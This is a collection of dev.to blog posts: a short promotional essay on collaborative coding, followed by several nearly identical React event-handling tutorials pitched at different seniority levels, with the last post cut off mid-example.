1,917,794 | From Solo Coder to Team Player: Why Two Heads are Better Than One (and Sometimes More Fun) | Alone we can do so little; together we can do so much. – Helen Keller The Power of... | 0 | 2024-07-09T20:21:55 | https://dev.to/socialcodeclub/from-solo-coder-to-team-player-why-two-heads-are-better-than-one-and-sometimes-more-fun-28hj | webdev, startup, coding, productivity |
> Alone we can do so little; together we can do so much. – Helen Keller
### The Power of Collaboration in Coding
If you've ever tried to debug a piece of code at 2 AM with a cup of cold coffee, you know this is true. As much as we might like to think of ourselves as coding ninjas, the reality is that coding is often a team sport. Here’s why teaming up with others can turn coding from a solo grind into a fun and productive adventure.
---
#### 1. Diverse Perspectives Lead to Better Solutions
Imagine you’re building a spaceship (because why not?). You might be great at the engines, but your friend knows how to make the control panel look like something straight out of Star Trek. Together, you create the coolest spaceship ever! Collaboration brings together different perspectives, making your projects more innovative and well-rounded.
#### 2. Learn and Grow Faster
Remember the time you spent three hours trying to figure out why your code wouldn’t run, only for a colleague to point out a missing semicolon? When you collaborate, you learn from each other’s mistakes and successes. It’s like having a cheat sheet that talks back and sometimes rolls its eyes at you.
#### 3. Get More Done, More Efficiently
Think of collaboration as a potluck dinner. Everyone brings something to the table, and before you know it, you’ve got a feast. When you split tasks with your team, you get more done in less time. Plus, someone else can bring dessert (or in this case, handle the tricky algorithms).
#### 4. Build a Supportive Community
Ever had a coding meltdown? You know, the kind where your computer screen starts looking like a blur of frustration? In a collaborative environment, you’ve got a support group ready to jump in and help out. They might not bring tissues, but they’ll definitely help debug that rogue function.
#### 5. Prepare for the Real World
In the professional world, coding is like a relay race. You need to pass the baton (or code) smoothly to the next person. By collaborating on projects now, you get a taste of what it’s like to work in a real tech team. You’ll develop essential soft skills like communication, teamwork, and managing not to strangle your co-workers when they refactor your code.
#### 6. Stay Accountable and Motivated
When you’re part of a team, you can’t just binge-watch an entire season of your favorite show instead of working (at least not without getting caught). Being accountable to others keeps you motivated. Plus, seeing your teammates’ progress can inspire you to put in your best effort – and maybe even finish your tasks before the deadline.
#### 7. Drive Innovation Together
Two heads are better than one, and a whole team of heads can create something truly extraordinary. Collaboration leads to collective brainstorming, and that’s where the real magic happens. The synergy of a team can push the boundaries of what’s possible.
---
### Join the [SocialCode](https://socialcode.club/) Community
At [SocialCode](https://socialcode.club/), we believe in the power of collaboration. Our platform connects developers, fostering a community where you can share knowledge, work on exciting projects, and grow together.
Say goodbye to solo coding and embrace the power of collaboration. Join us at [SocialCode](https://socialcode.club/) and be part of a vibrant, supportive community that’s shaping the future of technology — with a little less cold coffee and a lot more fun. | socialcodeclub |
1,917,795 | Intern level: Handling Events in React | Handling events in React is a crucial aspect of creating interactive web applications. This guide... | 0 | 2024-07-09T20:23:00 | https://dev.to/__zamora__/intern-level-handling-events-in-react-3b36 | react, webdev, javascript, programming | Handling events in React is a crucial aspect of creating interactive web applications. This guide will introduce you to the basics of event handling in React, including adding event handlers, understanding synthetic events, passing arguments to event handlers, creating custom events, and event delegation.
## Event Handling
### Adding Event Handlers in JSX
In React, you can add event handlers directly in your JSX. Event handlers are functions that are called when a particular event occurs, such as a button click or a form submission. React's event handling is similar to handling events in regular HTML, but with a few differences.
Example of adding an event handler:
```jsx
import React from 'react';
const handleClick = () => {
alert('Button clicked!');
};
const App = () => {
return (
<div>
<button onClick={handleClick}>Click Me</button>
</div>
);
};
export default App;
```
In this example, the `handleClick` function is called whenever the button is clicked. The `onClick` attribute in JSX is used to specify the event handler.
### Synthetic Events
React uses a system called synthetic events to handle events. Synthetic events are a cross-browser wrapper around the browser's native event system. This ensures that events behave consistently across different browsers.
Example of a synthetic event:
```jsx
import React from 'react';
const handleInputChange = (event) => {
console.log('Input value:', event.target.value);
};
const App = () => {
return (
<div>
<input type="text" onChange={handleInputChange} />
</div>
);
};
export default App;
```
In this example, the `handleInputChange` function logs the value of the input field whenever it changes. The `event` parameter is a synthetic event that provides consistent event properties across all browsers.
### Passing Arguments to Event Handlers
Sometimes, you need to pass additional arguments to event handlers. This can be done using an arrow function or the `bind` method.
Example using an arrow function:
```jsx
import React from 'react';
const handleClick = (message) => {
alert(message);
};
const App = () => {
return (
<div>
<button onClick={() => handleClick('Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Example using the `bind` method:
```jsx
import React from 'react';
const handleClick = (message) => {
alert(message);
};
const App = () => {
return (
<div>
<button onClick={handleClick.bind(null, 'Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Both methods allow you to pass additional arguments to the `handleClick` function.
## Custom Event Handling
### Creating Custom Events
While React's synthetic events cover most of the typical use cases, you might need to create custom events for more complex interactions. Custom events can be created and dispatched using the `CustomEvent` constructor and the `dispatchEvent` method.
Example of creating and dispatching a custom event:
```jsx
import React, { useEffect, useRef } from 'react';
const CustomEventComponent = () => {
const buttonRef = useRef(null);
useEffect(() => {
const handleCustomEvent = (event) => {
alert(event.detail.message);
};
const button = buttonRef.current;
button.addEventListener('customEvent', handleCustomEvent);
return () => {
button.removeEventListener('customEvent', handleCustomEvent);
};
}, []);
const handleClick = () => {
const customEvent = new CustomEvent('customEvent', {
detail: { message: 'Custom event triggered!' },
});
buttonRef.current.dispatchEvent(customEvent);
};
return (
<button ref={buttonRef} onClick={handleClick}>
Trigger Custom Event
</button>
);
};
export default CustomEventComponent;
```
In this example, a custom event named `customEvent` is created and dispatched when the button is clicked. The event handler listens for the custom event and displays an alert with the event's detail message.
### Event Delegation in React
Event delegation is a technique where a single event listener is used to manage events for multiple elements. This is useful for managing events efficiently, especially in lists or tables.
Example of event delegation:
```jsx
import React from 'react';
const handleClick = (event) => {
if (event.target.tagName === 'BUTTON') {
alert(`Button ${event.target.textContent} clicked!`);
}
};
const App = () => {
return (
<div onClick={handleClick}>
<button>1</button>
<button>2</button>
<button>3</button>
</div>
);
};
export default App;
```
In this example, a single event handler on the `div` element manages click events for all the buttons. The event handler checks the `event.target` to determine which button was clicked and displays an alert accordingly.
## Conclusion
Handling events in React is essential for creating interactive applications. By understanding how to add event handlers, use synthetic events, pass arguments to event handlers, create custom events, and leverage event delegation, you can build more dynamic and efficient React applications. As you gain experience, these techniques will become second nature, allowing you to create complex interactions with ease. | __zamora__ |
1,917,796 | Junior level: Handling Events in React | Handling events in React is a fundamental skill that allows you to create interactive and dynamic... | 0 | 2024-07-09T20:23:54 | https://dev.to/__zamora__/junior-level-handling-events-in-react-1bob | react, webdev, javascript, programming | Handling events in React is a fundamental skill that allows you to create interactive and dynamic applications. This guide will walk you through the basics of event handling in React, including adding event handlers, understanding synthetic events, passing arguments to event handlers, creating custom events, and using event delegation.
## Event Handling
### Adding Event Handlers in JSX
In React, you can add event handlers directly in your JSX. Event handlers are functions that are called when a specific event occurs, such as a button click or a form submission.
Example of adding an event handler:
```jsx
import React from 'react';
const handleClick = () => {
alert('Button clicked!');
};
const App = () => {
return (
<div>
<button onClick={handleClick}>Click Me</button>
</div>
);
};
export default App;
```
In this example, the `handleClick` function is called whenever the button is clicked. The `onClick` attribute in JSX is used to specify the event handler.
### Synthetic Events
React uses a system called synthetic events to handle events. Synthetic events are a cross-browser wrapper around the browser's native event system. This ensures that events behave consistently across different browsers.
Example of a synthetic event:
```jsx
import React from 'react';
const handleInputChange = (event) => {
console.log('Input value:', event.target.value);
};
const App = () => {
return (
<div>
<input type="text" onChange={handleInputChange} />
</div>
);
};
export default App;
```
In this example, the `handleInputChange` function logs the value of the input field whenever it changes. The `event` parameter is a synthetic event that provides consistent event properties across all browsers.
### Passing Arguments to Event Handlers
Sometimes, you need to pass additional arguments to event handlers. This can be done using an arrow function or the `bind` method.
Example using an arrow function:
```jsx
import React from 'react';
const handleClick = (message) => {
alert(message);
};
const App = () => {
return (
<div>
<button onClick={() => handleClick('Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Example using the `bind` method:
```jsx
import React from 'react';
const handleClick = (message) => {
alert(message);
};
const App = () => {
return (
<div>
<button onClick={handleClick.bind(null, 'Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Both methods allow you to pass additional arguments to the `handleClick` function.
## Custom Event Handling
### Creating Custom Events
While React's synthetic events cover most of the typical use cases, you might need to create custom events for more complex interactions. Custom events can be created and dispatched using the `CustomEvent` constructor and the `dispatchEvent` method.
Example of creating and dispatching a custom event:
```jsx
import React, { useEffect, useRef } from 'react';
const CustomEventComponent = () => {
const buttonRef = useRef(null);
useEffect(() => {
const handleCustomEvent = (event) => {
alert(event.detail.message);
};
const button = buttonRef.current;
button.addEventListener('customEvent', handleCustomEvent);
return () => {
button.removeEventListener('customEvent', handleCustomEvent);
};
}, []);
const handleClick = () => {
const customEvent = new CustomEvent('customEvent', {
detail: { message: 'Custom event triggered!' },
});
buttonRef.current.dispatchEvent(customEvent);
};
return (
<button ref={buttonRef} onClick={handleClick}>
Trigger Custom Event
</button>
);
};
export default CustomEventComponent;
```
In this example, a custom event named `customEvent` is created and dispatched when the button is clicked. The event handler listens for the custom event and displays an alert with the event's detail message.
### Event Delegation in React
Event delegation is a technique where a single event listener is used to manage events for multiple elements. This is useful for managing events efficiently, especially in lists or tables.
Example of event delegation:
```jsx
import React from 'react';
const handleClick = (event) => {
if (event.target.tagName === 'BUTTON') {
alert(`Button ${event.target.textContent} clicked!`);
}
};
const App = () => {
return (
<div onClick={handleClick}>
<button>1</button>
<button>2</button>
<button>3</button>
</div>
);
};
export default App;
```
In this example, a single event handler on the `div` element manages click events for all the buttons. The event handler checks the `event.target` to determine which button was clicked and displays an alert accordingly.
## Conclusion
Handling events in React is essential for creating interactive applications. By understanding how to add event handlers, use synthetic events, pass arguments to event handlers, create custom events, and leverage event delegation, you can build more dynamic and efficient React applications. As you gain experience, these techniques will become second nature, allowing you to create complex interactions with ease. | __zamora__ |
1,917,797 | Mid level: Handling Events in React | As a mid-level developer, you should have a solid understanding of handling events in React, which is... | 0 | 2024-07-09T20:24:41 | https://dev.to/__zamora__/mid-level-handling-events-in-react-j2e | react, webdev, javascript, programming | As a mid-level developer, you should have a solid understanding of handling events in React, which is essential for creating interactive and dynamic applications. This guide will cover advanced concepts and best practices, including adding event handlers, understanding synthetic events, passing arguments to event handlers, creating custom events, and leveraging event delegation.
## Event Handling
### Adding Event Handlers in JSX
In React, event handlers can be added directly in JSX. Event handlers are functions that are called when a specific event occurs, such as a button click or a form submission. Adding event handlers in JSX is similar to how it's done in regular HTML but with React's JSX syntax.
Example of adding an event handler:
```jsx
import React from 'react';
const handleClick = () => {
alert('Button clicked!');
};
const App = () => {
return (
<div>
<button onClick={handleClick}>Click Me</button>
</div>
);
};
export default App;
```
In this example, the `handleClick` function is called whenever the button is clicked. The `onClick` attribute in JSX is used to specify the event handler.
### Synthetic Events
React uses a system called synthetic events to handle events. Synthetic events are a cross-browser wrapper around the browser's native event system. This ensures that events behave consistently across different browsers.
Example of a synthetic event:
```jsx
import React from 'react';
const handleInputChange = (event) => {
console.log('Input value:', event.target.value);
};
const App = () => {
return (
<div>
<input type="text" onChange={handleInputChange} />
</div>
);
};
export default App;
```
In this example, the `handleInputChange` function logs the value of the input field whenever it changes. The `event` parameter is a synthetic event that provides consistent event properties across all browsers.
### Passing Arguments to Event Handlers
Sometimes, you need to pass additional arguments to event handlers. This can be done using an arrow function or the `bind` method.
Example using an arrow function:
```jsx
import React from 'react';
const handleClick = (message) => {
alert(message);
};
const App = () => {
return (
<div>
<button onClick={() => handleClick('Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Example using the `bind` method:
```jsx
import React from 'react';
const handleClick = (message) => {
alert(message);
};
const App = () => {
return (
<div>
<button onClick={handleClick.bind(null, 'Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Both methods allow you to pass additional arguments to the `handleClick` function.
## Custom Event Handling
### Creating Custom Events
While React's synthetic events cover most of the typical use cases, you might need to create custom events for more complex interactions. Custom events can be created and dispatched using the `CustomEvent` constructor and the `dispatchEvent` method.
Example of creating and dispatching a custom event:
```jsx
import React, { useEffect, useRef } from 'react';
const CustomEventComponent = () => {
const buttonRef = useRef(null);
useEffect(() => {
const handleCustomEvent = (event) => {
alert(event.detail.message);
};
const button = buttonRef.current;
button.addEventListener('customEvent', handleCustomEvent);
return () => {
button.removeEventListener('customEvent', handleCustomEvent);
};
}, []);
const handleClick = () => {
const customEvent = new CustomEvent('customEvent', {
detail: { message: 'Custom event triggered!' },
});
buttonRef.current.dispatchEvent(customEvent);
};
return (
<button ref={buttonRef} onClick={handleClick}>
Trigger Custom Event
</button>
);
};
export default CustomEventComponent;
```
In this example, a custom event named `customEvent` is created and dispatched when the button is clicked. The event handler listens for the custom event and displays an alert with the event's detail message.
### Event Delegation in React
Event delegation is a technique where a single event listener is used to manage events for multiple elements. This is useful for managing events efficiently, especially in lists or tables.
Example of event delegation:
```jsx
import React from 'react';
const handleClick = (event) => {
if (event.target.tagName === 'BUTTON') {
alert(`Button ${event.target.textContent} clicked!`);
}
};
const App = () => {
return (
<div onClick={handleClick}>
<button>1</button>
<button>2</button>
<button>3</button>
</div>
);
};
export default App;
```
In this example, a single event handler on the `div` element manages click events for all the buttons. The event handler checks the `event.target` to determine which button was clicked and displays an alert accordingly.
## Best Practices for Event Handling in React
1. **Use Event Handlers Wisely:** Avoid creating new event handler functions inside render methods, as it can lead to performance issues. Instead, define your event handlers outside the render method.
2. **Prevent Default Behavior:** Use `event.preventDefault()` to prevent the default behavior of events when necessary, such as form submissions or anchor tag clicks.
```jsx
const handleSubmit = (event) => {
event.preventDefault();
// Handle form submission
};
return <form onSubmit={handleSubmit}>...</form>;
```
3. **Stop Propagation:** Use `event.stopPropagation()` to stop the propagation of events to parent elements when needed.
```jsx
const handleButtonClick = (event) => {
event.stopPropagation();
// Handle button click
};
return <button onClick={handleButtonClick}>Click Me</button>;
```
4. **Debouncing and Throttling:** Use debouncing or throttling techniques to limit the number of times an event handler is called for high-frequency events like scrolling or resizing.
5. **Clean Up Event Listeners:** When adding event listeners directly to DOM elements (especially in class components or hooks), ensure to clean them up to avoid memory leaks.
```jsx
useEffect(() => {
const handleResize = () => {
// Handle resize
};
window.addEventListener('resize', handleResize);
return () => {
window.removeEventListener('resize', handleResize);
};
}, []);
```
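The debouncing technique mentioned in item 4 can be sketched as a small helper. This is a minimal illustration (the 300 ms delay and handler names are arbitrary), not tied to any particular library:

```javascript
// Minimal debounce helper: delays calling `func` until `delay` ms
// have passed without another invocation.
const debounce = (func, delay) => {
  let timeoutId;
  return (...args) => {
    clearTimeout(timeoutId);
    timeoutId = setTimeout(() => {
      func.apply(null, args);
    }, delay);
  };
};

// Example: log the window width at most once per 300 ms of inactivity.
const logResize = debounce(() => {
  console.log('Window width:', window.innerWidth);
}, 300);
// window.addEventListener('resize', logResize);
```

Pair this with the cleanup pattern from item 5: register the debounced handler in `useEffect` and remove it in the effect's cleanup function.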
## Conclusion
Handling events in React is essential for creating interactive applications. By understanding how to add event handlers, use synthetic events, pass arguments to event handlers, create custom events, and leverage event delegation, you can build more dynamic and efficient React applications. Implementing best practices ensures your applications remain performant and maintainable as they grow in complexity. As a mid-level developer, mastering these techniques will enhance your ability to handle complex interactions and contribute to the success of your projects. | __zamora__ |
1,917,798 | Senior level: Handling Events in React | As a senior developer, you are expected to have a deep understanding of event handling in React. This... | 0 | 2024-07-09T20:25:48 | https://dev.to/__zamora__/senior-level-handling-events-in-react-9h8 | react, webdev, javascript, programming | As a senior developer, you are expected to have a deep understanding of event handling in React. This involves not only knowing the basics but also mastering advanced techniques to create efficient, maintainable, and scalable applications. This article covers the intricacies of event handling in React, including adding event handlers, understanding synthetic events, passing arguments to event handlers, creating custom events, and leveraging event delegation.
## Event Handling
### Adding Event Handlers in JSX
Adding event handlers in JSX is straightforward and similar to handling events in regular HTML, but with some key differences due to React's unique architecture.
Example of adding an event handler:
```jsx
import React from 'react';
const handleClick = () => {
console.log('Button clicked!');
};
const App = () => {
return (
<div>
<button onClick={handleClick}>Click Me</button>
</div>
);
};
export default App;
```
In this example, the `handleClick` function is called whenever the button is clicked. The `onClick` attribute in JSX is used to specify the event handler.
### Synthetic Events
React uses a system called synthetic events to handle events. Synthetic events are a cross-browser wrapper around the browser's native event system. This ensures that events behave consistently across different browsers, providing a unified API.
Example of a synthetic event:
```jsx
import React from 'react';
const handleInputChange = (event) => {
console.log('Input value:', event.target.value);
};
const App = () => {
return (
<div>
<input type="text" onChange={handleInputChange} />
</div>
);
};
export default App;
```
In this example, the `handleInputChange` function logs the value of the input field whenever it changes. The `event` parameter is a synthetic event that provides consistent event properties across all browsers.
### Passing Arguments to Event Handlers
Passing arguments to event handlers can be done using an arrow function or the `bind` method, which is crucial for handling events in a more flexible way.
Example using an arrow function:
```jsx
import React from 'react';
const handleClick = (message) => {
console.log(message);
};
const App = () => {
return (
<div>
<button onClick={() => handleClick('Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Example using the `bind` method:
```jsx
import React from 'react';
const handleClick = (message) => {
console.log(message);
};
const App = () => {
return (
<div>
<button onClick={handleClick.bind(null, 'Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Both methods allow you to pass additional arguments to the `handleClick` function, providing flexibility in event handling.
## Custom Event Handling
### Creating Custom Events
Creating custom events in React is necessary for more complex interactions that aren't covered by standard events. Custom events can be created and dispatched using the `CustomEvent` constructor and the `dispatchEvent` method.
Example of creating and dispatching a custom event:
```jsx
import React, { useEffect, useRef } from 'react';
const CustomEventComponent = () => {
const buttonRef = useRef(null);
useEffect(() => {
const handleCustomEvent = (event) => {
console.log(event.detail.message);
};
const button = buttonRef.current;
button.addEventListener('customEvent', handleCustomEvent);
return () => {
button.removeEventListener('customEvent', handleCustomEvent);
};
}, []);
const handleClick = () => {
const customEvent = new CustomEvent('customEvent', {
detail: { message: 'Custom event triggered!' },
});
buttonRef.current.dispatchEvent(customEvent);
};
return (
<button ref={buttonRef} onClick={handleClick}>
Trigger Custom Event
</button>
);
};
export default CustomEventComponent;
```
In this example, a custom event named `customEvent` is created and dispatched when the button is clicked. The event handler listens for the custom event and logs the event's detail message.
### Event Delegation in React
Event delegation is a technique where a single event listener is used to manage events for multiple elements. This is especially useful for managing events efficiently in lists or tables.
Example of event delegation:
```jsx
import React from 'react';
const handleClick = (event) => {
if (event.target.tagName === 'BUTTON') {
console.log(`Button ${event.target.textContent} clicked!`);
}
};
const App = () => {
return (
<div onClick={handleClick}>
<button>1</button>
<button>2</button>
<button>3</button>
</div>
);
};
export default App;
```
In this example, a single event handler on the `div` element manages click events for all the buttons. The event handler checks the `event.target` to determine which button was clicked and logs a message accordingly.
## Best Practices for Event Handling in React
1. **Avoid Creating Inline Functions in JSX:** Creating new functions inside the render method can lead to unnecessary re-renders and performance issues. Instead, define event handlers as class methods or use hooks.
```jsx
const App = () => {
const handleClick = () => {
console.log('Button clicked!');
};
return (
<div>
<button onClick={handleClick}>Click Me</button>
</div>
);
};
```
2. **Prevent Default Behavior and Stop Propagation:** Use `event.preventDefault()` to prevent default behavior and `event.stopPropagation()` to stop event propagation when necessary.
```jsx
const handleSubmit = (event) => {
event.preventDefault();
// Handle form submission
};
return <form onSubmit={handleSubmit}>...</form>;
```
3. **Clean Up Event Listeners:** When adding event listeners directly to DOM elements, ensure to clean them up to avoid memory leaks.
```jsx
useEffect(() => {
const handleResize = () => {
console.log('Window resized');
};
window.addEventListener('resize', handleResize);
return () => {
window.removeEventListener('resize', handleResize);
};
}, []);
```
4. **Debounce or Throttle High-Frequency Events:** Use debounce or throttle techniques for high-frequency events like scrolling or resizing to improve performance.
```jsx
const debounce = (func, delay) => {
let timeoutId;
return (...args) => {
clearTimeout(timeoutId);
timeoutId = setTimeout(() => {
func.apply(null, args);
}, delay);
};
};
useEffect(() => {
const handleScroll = debounce(() => {
console.log('Scroll event');
}, 300);
window.addEventListener('scroll', handleScroll);
return () => {
window.removeEventListener('scroll', handleScroll);
};
}, []);
```
5. **Use Event Delegation Wisely:** Leverage event delegation for elements that are dynamically added to or removed from the DOM, such as lists of items.
```jsx
const List = () => {
const handleClick = (event) => {
if (event.target.tagName === 'LI') {
console.log(`Item ${event.target.textContent} clicked!`);
}
};
return (
<ul onClick={handleClick}>
<li>Item 1</li>
<li>Item 2</li>
<li>Item 3</li>
</ul>
);
};
```
## Conclusion
Handling events in React efficiently is crucial for creating interactive and high-performance applications. By mastering the techniques of adding event handlers, using synthetic events, passing arguments to event handlers, creating custom events, and leveraging event delegation, you can build robust and scalable applications. Implementing best practices ensures that your code remains maintainable and performant as it grows in complexity. As a senior developer, your ability to utilize these advanced techniques will significantly contribute to the success of your projects and the effectiveness of your team. | __zamora__ |
1,917,799 | Lead level: Handling Events in React | As a lead developer, it’s crucial to master the advanced concepts of event handling in React to... | 0 | 2024-07-09T20:26:26 | https://dev.to/__zamora__/lead-level-handling-events-in-react-406 | react, webdev, javascript, programming | As a lead developer, it’s crucial to master the advanced concepts of event handling in React to ensure your applications are efficient, maintainable, and scalable. This article will cover sophisticated techniques and best practices for handling events in React, including adding event handlers, understanding synthetic events, passing arguments to event handlers, creating custom events, and leveraging event delegation.
## Event Handling
### Adding Event Handlers in JSX
Adding event handlers in JSX is a straightforward process that is fundamental to creating interactive React applications. Event handlers in JSX are similar to those in HTML but with React's JSX syntax and specific considerations for performance and readability.
Example of adding an event handler:
```jsx
import React from 'react';
const handleClick = () => {
console.log('Button clicked!');
};
const App = () => {
return (
<div>
<button onClick={handleClick}>Click Me</button>
</div>
);
};
export default App;
```
In this example, the `handleClick` function is triggered whenever the button is clicked. The `onClick` attribute in JSX is used to specify the event handler.
### Synthetic Events
React uses synthetic events to ensure that events behave consistently across different browsers. Synthetic events are a cross-browser wrapper around the browser's native event system, providing a unified API for handling events in React.
Example of a synthetic event:
```jsx
import React from 'react';
const handleInputChange = (event) => {
console.log('Input value:', event.target.value);
};
const App = () => {
return (
<div>
<input type="text" onChange={handleInputChange} />
</div>
);
};
export default App;
```
In this example, the `handleInputChange` function logs the value of the input field whenever it changes. The `event` parameter is a synthetic event that provides consistent event properties across all browsers.
### Passing Arguments to Event Handlers
To pass additional arguments to event handlers, you can use an arrow function or the `bind` method. This technique is essential for handling dynamic data and interactions in a flexible manner.
Example using an arrow function:
```jsx
import React from 'react';
const handleClick = (message) => {
console.log(message);
};
const App = () => {
return (
<div>
<button onClick={() => handleClick('Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Example using the `bind` method:
```jsx
import React from 'react';
const handleClick = (message) => {
console.log(message);
};
const App = () => {
return (
<div>
<button onClick={handleClick.bind(null, 'Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Both methods allow you to pass additional arguments to the `handleClick` function, providing flexibility in handling events.
## Custom Event Handling
### Creating Custom Events
Creating custom events can be necessary for more complex interactions that go beyond standard events. Custom events can be created and dispatched using the `CustomEvent` constructor and the `dispatchEvent` method.
Example of creating and dispatching a custom event:
```jsx
import React, { useEffect, useRef } from 'react';
const CustomEventComponent = () => {
const buttonRef = useRef(null);
useEffect(() => {
const handleCustomEvent = (event) => {
console.log(event.detail.message);
};
const button = buttonRef.current;
button.addEventListener('customEvent', handleCustomEvent);
return () => {
button.removeEventListener('customEvent', handleCustomEvent);
};
}, []);
const handleClick = () => {
const customEvent = new CustomEvent('customEvent', {
detail: { message: 'Custom event triggered!' },
});
buttonRef.current.dispatchEvent(customEvent);
};
return (
<button ref={buttonRef} onClick={handleClick}>
Trigger Custom Event
</button>
);
};
export default CustomEventComponent;
```
In this example, a custom event named `customEvent` is created and dispatched when the button is clicked. The event handler listens for the custom event and logs the event's detail message.
### Event Delegation in React
Event delegation is a technique where a single event listener is used to manage events for multiple elements. This is especially useful for managing events efficiently in dynamic lists or tables, as it reduces the number of event listeners required.
Example of event delegation:
```jsx
import React from 'react';
const handleClick = (event) => {
if (event.target.tagName === 'BUTTON') {
console.log(`Button ${event.target.textContent} clicked!`);
}
};
const App = () => {
return (
<div onClick={handleClick}>
<button>1</button>
<button>2</button>
<button>3</button>
</div>
);
};
export default App;
```
In this example, a single event handler on the `div` element manages click events for all the buttons. The event handler checks the `event.target` to determine which button was clicked and logs a message accordingly.
## Best Practices for Event Handling in React
1. **Avoid Creating Inline Functions in JSX:** Creating new functions inside the render method can lead to unnecessary re-renders and performance issues. Define event handlers outside the render method or use hooks.
```jsx
const App = () => {
const handleClick = () => {
console.log('Button clicked!');
};
return (
<div>
<button onClick={handleClick}>Click Me</button>
</div>
);
};
```
2. **Prevent Default Behavior and Stop Propagation:** Use `event.preventDefault()` to prevent default behavior and `event.stopPropagation()` to stop event propagation when necessary.
```jsx
const handleSubmit = (event) => {
event.preventDefault();
// Handle form submission
};
return <form onSubmit={handleSubmit}>...</form>;
```
3. **Clean Up Event Listeners:** When adding event listeners directly to DOM elements, ensure to clean them up to avoid memory leaks.
```jsx
useEffect(() => {
const handleResize = () => {
console.log('Window resized');
};
window.addEventListener('resize', handleResize);
return () => {
window.removeEventListener('resize', handleResize);
};
}, []);
```
4. **Debounce or Throttle High-Frequency Events:** Use debounce or throttle techniques for high-frequency events like scrolling or resizing to improve performance.
```jsx
const debounce = (func, delay) => {
let timeoutId;
return (...args) => {
clearTimeout(timeoutId);
timeoutId = setTimeout(() => {
func.apply(null, args);
}, delay);
};
};
useEffect(() => {
const handleScroll = debounce(() => {
console.log('Scroll event');
}, 300);
window.addEventListener('scroll', handleScroll);
return () => {
window.removeEventListener('scroll', handleScroll);
};
}, []);
```
5. **Use Event Delegation Wisely:** Leverage event delegation for elements that are dynamically added to or removed from the DOM, such as lists of items.
```jsx
const List = () => {
const handleClick = (event) => {
if (event.target.tagName === 'LI') {
console.log(`Item ${event.target.textContent} clicked!`);
}
};
return (
<ul onClick={handleClick}>
<li>Item 1</li>
<li>Item 2</li>
<li>Item 3</li>
</ul>
);
};
```
## Conclusion
Handling events in React efficiently is crucial for creating interactive and high-performance applications. By mastering the techniques of adding event handlers, using synthetic events, passing arguments to event handlers, creating custom events, and leveraging event delegation, you can build robust and scalable applications. Implementing best practices ensures that your code remains maintainable and performant as it grows in complexity. As a lead developer, your ability to utilize these advanced techniques will significantly contribute to the success of your projects and the effectiveness of your team. | __zamora__ |
1,917,800 | Architect level: Handling Events in React | As an architect-level developer, your focus should be on designing scalable, maintainable, and... | 0 | 2024-07-09T20:27:08 | https://dev.to/__zamora__/architect-level-handling-events-in-react-31ho | react, webdev, javascript, programming | As an architect-level developer, your focus should be on designing scalable, maintainable, and performant applications. Handling events efficiently in React is a crucial part of this. This article delves into advanced concepts and best practices for event handling in React, including adding event handlers, understanding synthetic events, passing arguments to event handlers, creating custom events, and leveraging event delegation.
## Event Handling
### Adding Event Handlers in JSX
Adding event handlers in JSX is the foundation of creating interactive applications. Event handlers in JSX are similar to those in HTML but tailored to React's architecture and performance considerations.
Example of adding an event handler:
```jsx
import React from 'react';
const handleClick = () => {
console.log('Button clicked!');
};
const App = () => {
return (
<div>
<button onClick={handleClick}>Click Me</button>
</div>
);
};
export default App;
```
In this example, the `handleClick` function is called whenever the button is clicked. The `onClick` attribute in JSX specifies the event handler.
### Synthetic Events
React uses synthetic events to ensure consistent behavior across different browsers. Synthetic events are a cross-browser wrapper around the browser's native event system, providing a unified API.
Example of a synthetic event:
```jsx
import React from 'react';
const handleInputChange = (event) => {
console.log('Input value:', event.target.value);
};
const App = () => {
return (
<div>
<input type="text" onChange={handleInputChange} />
</div>
);
};
export default App;
```
In this example, the `handleInputChange` function logs the value of the input field whenever it changes. The `event` parameter is a synthetic event that provides consistent event properties across all browsers.
### Passing Arguments to Event Handlers
Passing arguments to event handlers can be achieved using arrow functions or the `bind` method. This technique is essential for handling events in a flexible manner.
Example using an arrow function:
```jsx
import React from 'react';
const handleClick = (message) => {
console.log(message);
};
const App = () => {
return (
<div>
<button onClick={() => handleClick('Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Example using the `bind` method:
```jsx
import React from 'react';
const handleClick = (message) => {
console.log(message);
};
const App = () => {
return (
<div>
<button onClick={handleClick.bind(null, 'Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Both methods allow you to pass additional arguments to the `handleClick` function, providing flexibility in event handling.
## Custom Event Handling
### Creating Custom Events
Creating custom events can be necessary for complex interactions that go beyond standard events. Custom events can be created and dispatched using the `CustomEvent` constructor and the `dispatchEvent` method.
Example of creating and dispatching a custom event:
```jsx
import React, { useEffect, useRef } from 'react';
const CustomEventComponent = () => {
const buttonRef = useRef(null);
useEffect(() => {
const handleCustomEvent = (event) => {
console.log(event.detail.message);
};
const button = buttonRef.current;
button.addEventListener('customEvent', handleCustomEvent);
return () => {
button.removeEventListener('customEvent', handleCustomEvent);
};
}, []);
const handleClick = () => {
const customEvent = new CustomEvent('customEvent', {
detail: { message: 'Custom event triggered!' },
});
buttonRef.current.dispatchEvent(customEvent);
};
return (
<button ref={buttonRef} onClick={handleClick}>
Trigger Custom Event
</button>
);
};
export default CustomEventComponent;
```
In this example, a custom event named `customEvent` is created and dispatched when the button is clicked. The event handler listens for the custom event and logs the event's detail message.
### Event Delegation in React
Event delegation is a technique where a single event listener is used to manage events for multiple elements. This is especially useful for managing events efficiently in dynamic lists or tables, as it reduces the number of event listeners required.
Example of event delegation:
```jsx
import React from 'react';
const handleClick = (event) => {
if (event.target.tagName === 'BUTTON') {
console.log(`Button ${event.target.textContent} clicked!`);
}
};
const App = () => {
return (
<div onClick={handleClick}>
<button>1</button>
<button>2</button>
<button>3</button>
</div>
);
};
export default App;
```
In this example, a single event handler on the `div` element manages click events for all the buttons. The event handler checks the `event.target` to determine which button was clicked and logs a message accordingly.
## Best Practices for Event Handling in React
1. **Avoid Creating Inline Functions in JSX:** Creating new functions inside the render method can lead to unnecessary re-renders and performance issues. Define event handlers outside the render method or use hooks.
```jsx
const App = () => {
